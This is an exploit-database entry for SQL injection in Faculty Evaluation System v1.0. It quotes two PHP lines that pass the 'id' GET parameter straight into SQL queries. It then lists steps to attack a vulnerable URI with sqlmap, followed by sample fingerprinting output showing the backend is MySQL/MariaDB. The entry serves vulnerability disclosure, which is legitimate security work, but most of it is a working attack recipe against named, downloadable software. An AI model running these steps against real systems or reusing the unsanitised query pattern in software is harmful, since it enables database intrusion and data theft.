Share
## https://sploitus.com/exploit?id=PACKETSTORM:173349
# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection  
# Date: 07/2023  
# Exploit Author: Andrey Stoykov  
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip  
# Version: 1.0  
# Tested on: Windows Server 2022  
  
  
SQLi #1  
  
File: edit_evaluation  
  
Line #4  
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();  
[...]  
  
  
SQLi #2  
  
File: view_faculty.php  
  
Line #4  
  
// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer  
[...]  
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();  
[...]  
  
  
Steps to Exploit:  
  
1. Login to application  
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"  
3. Copy request to intercept proxy to file  
4. Exploit using SQLMap  
  
  
sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint  
  
[...]  
[INFO] testing MySQL  
[INFO] confirming MySQL  
[INFO] the back-end DBMS is MySQL  
[INFO] actively fingerprinting MySQL  
[INFO] executing MySQL comment injection fingerprint  
back-end DBMS: active fingerprint: MySQL >= 5.7  
comment injection fingerprint: MySQL 5.6.49  
fork fingerprint: MariaDB  
[...]